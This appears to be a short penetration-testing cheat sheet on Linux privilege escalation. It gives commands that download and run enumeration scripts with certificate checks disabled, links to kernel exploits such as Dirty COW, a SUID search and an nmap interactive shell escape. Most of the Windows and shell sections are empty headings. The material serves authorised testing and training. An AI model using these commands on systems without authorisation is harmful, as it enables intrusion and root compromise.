Post Exploitation

Linux Privilege Escalation

# Kernel Exploits
wget --no-check-certificate https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl

# Common Linux Exploits
# Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition
https://www.exploit-db.com/exploits/40839

# Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice'
https://www.exploit-db.com/exploits/5093

# Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1
https://www.exploit-db.com/exploits/8572
# Misconfigurations
wget --no-check-certificate https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
bash LinEnum.sh

# SUID Bit
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
nmap –interactive
!sh

Windows Privilege Escalation

Verify

Exploit

Compile

File Transfer

Wget

Netcat

Powershell

Interactive Shell

Metasploit Post Exploitation

Meterpreter

Last updated